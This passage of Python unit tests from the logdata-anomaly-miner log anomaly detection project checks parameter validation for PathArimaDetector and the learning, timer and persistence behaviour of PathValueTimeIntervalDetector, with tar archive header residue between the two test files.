persistence_id=True) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="Default") self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[""]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list="") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=True) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123.3) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list={"id": 
"Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[]) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=None) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=None) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=b"True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline="True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=True) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, learn_mode=b"True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode="True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init={"id": "Default"}) self.assertRaises(TypeError, 
PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=b"True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length="True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=True) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, set_period_length=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=100.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=100) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=1.1) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], 
etd, alpha={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=0) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=0.5) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1.1) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=set()) PathArimaDetector(self.aminer_config, 
[self.stream_printer_event_handler], etd, alpha_bt=0) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0.5) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=100.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=100) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=0) self.assertRaises(TypeError, PathArimaDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=set()) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=0) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=30, num_max_time_history=20) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=["Default"]) self.assertRaises(TypeError, PathArimaDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=20, num_max_time_history=100) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=20.1, num_max_time_history=100.1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=100.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
num_periods_tsa_ini=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=20) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
log_resource_ignore_list="") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=True) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["file:///tmp/syslog"]) @classmethod def setUpClass(cls): """Set up the data for the all tests.""" cls.alphabet = b"abcdefghijklmnopqrstuvwxyz" cls.analysis = "Analysis.%s" children = [] for _, val in enumerate(cls.alphabet): char = bytes([val]) children.append(DummyFixedDataModelElement("value", char)) cls.alphabet_model = DummyFirstMatchModelElement("first", children) cls.data = cls.generate_data(cls, 120, 1) set_random_seed(42) def run_pad_test(self, pad, etd, log_atoms): """Run the ECD test.""" for log_atom in log_atoms: etd.receive_atom(log_atom) pad.receive_atom(log_atom) self.assertTrue(pad.arima_models) def generate_data(self, iterations, diff): """Generate data without any error.""" log_atoms = [] t = time.time() for i in range(1, iterations+1): char = bytes([self.alphabet[i % len(self.alphabet)]]) t += diff num = str(random.uniform(0, 
1000)).encode() m1 = MatchElement("/model/id", num, num, None) m2 = MatchElement("/model/value", char, char, None) log_atoms.append(LogAtom(num + char, ParserMatch(MatchElement("/model", num + char, num + char, [m1, m2])), t + 1, None)) return log_atoms if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/PathValueTimeIntervalDetectorTest.py000066400000000000000000001010571500476301700327300ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.PathValueTimeIntervalDetector import PathValueTimeIntervalDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class PathValueTimeIntervalDetectorTest(TestBase): """Unittests for the PathValueTimeIntervalDetector.""" def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. 
""" t = time.time() expected_string_first = '%s First time (%d) detected for [%s]\n%s: "None" (%d lines)\n %s\n\n' expected_string_new = '%s New time (%d) out of range of previously observed times %s detected for [%s]\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" log_atom1 = LogAtom(b"1", ParserMatch(MatchElement("/model/id", b"1", b"1", None)), t, None) log_atom2 = LogAtom(b"1", ParserMatch(MatchElement("/model/value", b"1", b"1", None)), t, None) log_atom3 = LogAtom(b"3", ParserMatch(MatchElement("/model/id", b"3", b"3", None)), t, None) pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], learn_mode=True, output_logline=False) pvtid.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t).strftime(dtf), int(t % pvtid.time_period_length), "1", pvtid.__class__.__name__, 1, "/model/id\n1")) self.reset_output_stream() appeared_time_list = {(log_atom1.raw_data.decode(),): [t % pvtid.time_period_length]} for i in range(10): log_atom1.atom_time += 1 pvtid.receive_atom(log_atom1) appeared_time_list[(log_atom1.raw_data.decode(),)] += [log_atom1.atom_time % pvtid.time_period_length] if (i + 1) % pvtid.num_reduce_time_list == 0: appeared_time_list[(log_atom1.raw_data.decode(),)] = [appeared_time_list[(log_atom1.raw_data.decode(),)][0], appeared_time_list[(log_atom1.raw_data.decode(),)][-1]] self.assertEqual(pvtid.counter_reduce_time_intervals[(log_atom1.raw_data.decode(),)], (i+1) % pvtid.num_reduce_time_list) self.assertEqual(pvtid.appeared_time_list, appeared_time_list) log_atom1.atom_time = t + 100000 pvtid.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string_new % (datetime.fromtimestamp(t+100000).strftime(dtf), int((t+100000) % pvtid.time_period_length), [int(t % pvtid.time_period_length), int((t+10) % pvtid.time_period_length)], "1", pvtid.__class__.__name__, 1, "/model/id\n1")) 
self.reset_output_stream() log_atom1.atom_time = t # allow_missing_values_flag=False pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], learn_mode=True, output_logline=False, allow_missing_values_flag=False) pvtid.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t).strftime(dtf), int(t % pvtid.time_period_length), "1", pvtid.__class__.__name__, 1, "/model/id\n1")) self.reset_output_stream() appeared_time_list = {(log_atom1.raw_data.decode(),): [t % pvtid.time_period_length]} for i in range(10): log_atom1.atom_time += 1 pvtid.receive_atom(log_atom1) appeared_time_list[(log_atom1.raw_data.decode(),)] += [log_atom1.atom_time % pvtid.time_period_length] if (i + 1) % pvtid.num_reduce_time_list == 0: appeared_time_list[(log_atom1.raw_data.decode(),)] = [appeared_time_list[(log_atom1.raw_data.decode(),)][0], appeared_time_list[(log_atom1.raw_data.decode(),)][-1]] self.assertEqual(pvtid.counter_reduce_time_intervals[(log_atom1.raw_data.decode(),)], (i+1) % pvtid.num_reduce_time_list) self.assertEqual(pvtid.appeared_time_list, appeared_time_list) log_atom1.atom_time = t + 100000 pvtid.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string_new % (datetime.fromtimestamp(t+100000).strftime(dtf), int((t+100000) % pvtid.time_period_length), [int(t % pvtid.time_period_length), int((t+10) % pvtid.time_period_length)], "1", pvtid.__class__.__name__, 1, "/model/id\n1")) self.reset_output_stream() log_atom1.atom_time = t self.assertFalse(pvtid.receive_atom(log_atom2)) # stop_learning_time pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100) self.assertTrue(pvtid.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(pvtid.receive_atom(log_atom1)) self.assertTrue(pvtid.learn_mode) log_atom1.atom_time = t + 101 
# NOTE(review): the statements up to the next "def" are the tail of a test method whose start lies above this span; they are kept as written.
        self.assertTrue(pvtid.receive_atom(log_atom1))
        self.assertFalse(pvtid.learn_mode)
        # stop_learning_no_anomaly_time
        pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True,
                                              stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(pvtid.receive_atom(log_atom1))
        log_atom3.atom_time = t + 100
        self.assertTrue(pvtid.receive_atom(log_atom3))
        self.assertTrue(pvtid.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(pvtid.receive_atom(log_atom2))
        self.assertTrue(pvtid.learn_mode)
        log_atom1.atom_time = t + 200
        self.assertTrue(pvtid.receive_atom(log_atom1))
        self.assertTrue(pvtid.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(pvtid.receive_atom(log_atom1))
        self.assertFalse(pvtid.learn_mode)

    def test2do_timer(self):
        """Check the values do_timer returns around the next persistence deadline.

        With next_persist_time 400 s ahead, do_timer reports the remaining seconds until that
        deadline; once the deadline is reached it reports DEFAULT_PERSISTENCE_PERIOD again.
        """
        detector = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"])
        now = time.time()
        detector.next_persist_time = now + 400
        # (offset from now, expected return value); order matters because do_timer updates its own state.
        expectations = ((200, 200), (400, DEFAULT_PERSISTENCE_PERIOD), (999, 1), (1000, DEFAULT_PERSISTENCE_PERIOD))
        for offset, expected in expectations:
            self.assertEqual(detector.do_timer(now + offset), expected)

    def test3persistence(self):
        """Round-trip the learned state through do_persist and load_persistence_data.

        Feeds one value eleven times (so the time list is reduced once), persists, checks the
        raw persistence file against the expected time list, clears the in-memory state, reloads
        it and finally verifies that a second detector instance sees the same persisted data.
        """
        now = time.time()
        log_atom = LogAtom(b"1", ParserMatch(MatchElement("/model/id", b"1", b"1", None)), now, None)
        detector = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], learn_mode=True,
                                                 output_logline=False)
        detector.receive_atom(log_atom)
        key = (log_atom.raw_data.decode(),)
        expected_times = {key: [now % detector.time_period_length]}
        for i in range(10):
            log_atom.atom_time += 1
            detector.receive_atom(log_atom)
            expected_times[key].append(log_atom.atom_time % detector.time_period_length)
            if (i + 1) % detector.num_reduce_time_list == 0:
                # the detector keeps only the first and last entry after num_reduce_time_list additions
                expected_times[key] = [expected_times[key][0], expected_times[key][-1]]
        log_atom.atom_time = now + 100000
        expected_times[key] = [log_atom.atom_time % detector.time_period_length] + expected_times[key]
        detector.receive_atom(log_atom)
        detector.do_persist()
        # The persistence file is read back raw; the fixed prefix/suffix of the serialized structure is
        # stripped so that only the comma separated time values remain.
        with open(detector.persistence_file_name, "r") as persisted:
            raw_values = persisted.read().replace('[[[["string:1"], [', "").replace(']]], [[["string:1"], 1]]]', "").split(",")
        persisted_times = sorted(float(value) for value in raw_values)
        expected_sorted = expected_times[key]
        expected_sorted.sort()  # in place on purpose: the dict compared below must contain the sorted list as well
        self.assertEqual(persisted_times, expected_sorted)
        self.assertEqual(detector.counter_reduce_time_intervals[key], 1)
        self.assertEqual(detector.appeared_time_list, expected_times)
        detector.appeared_time_list = {}
        detector.counter_reduce_time_intervals = {}
        detector.load_persistence_data()
        self.assertEqual(detector.counter_reduce_time_intervals[key], 1)
        self.assertEqual(detector.appeared_time_list, expected_times)
        other = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/model/value"],
                                             learn_mode=True)
        self.assertEqual(other.counter_reduce_time_intervals, detector.counter_reduce_time_intervals)
        self.assertEqual(other.appeared_time_list, detector.appeared_time_list)

    def test4add_to_persistence_event(self):
        """Adding a persistence event registers the value with an empty reduce counter and its time."""
        detector = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"])
        detector.add_to_persistence_event("Analysis.PathValueTimeIntervalDetector", [["a"], 3.0])
        self.assertEqual(detector.counter_reduce_time_intervals, {('a',): 0})
        self.assertEqual(detector.appeared_time_list, {('a',): [3.0]})

    def test5remove_from_persistence_event(self):
        """Removing a persistence event drops the time but keeps the value's counter entry."""
        detector = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"])
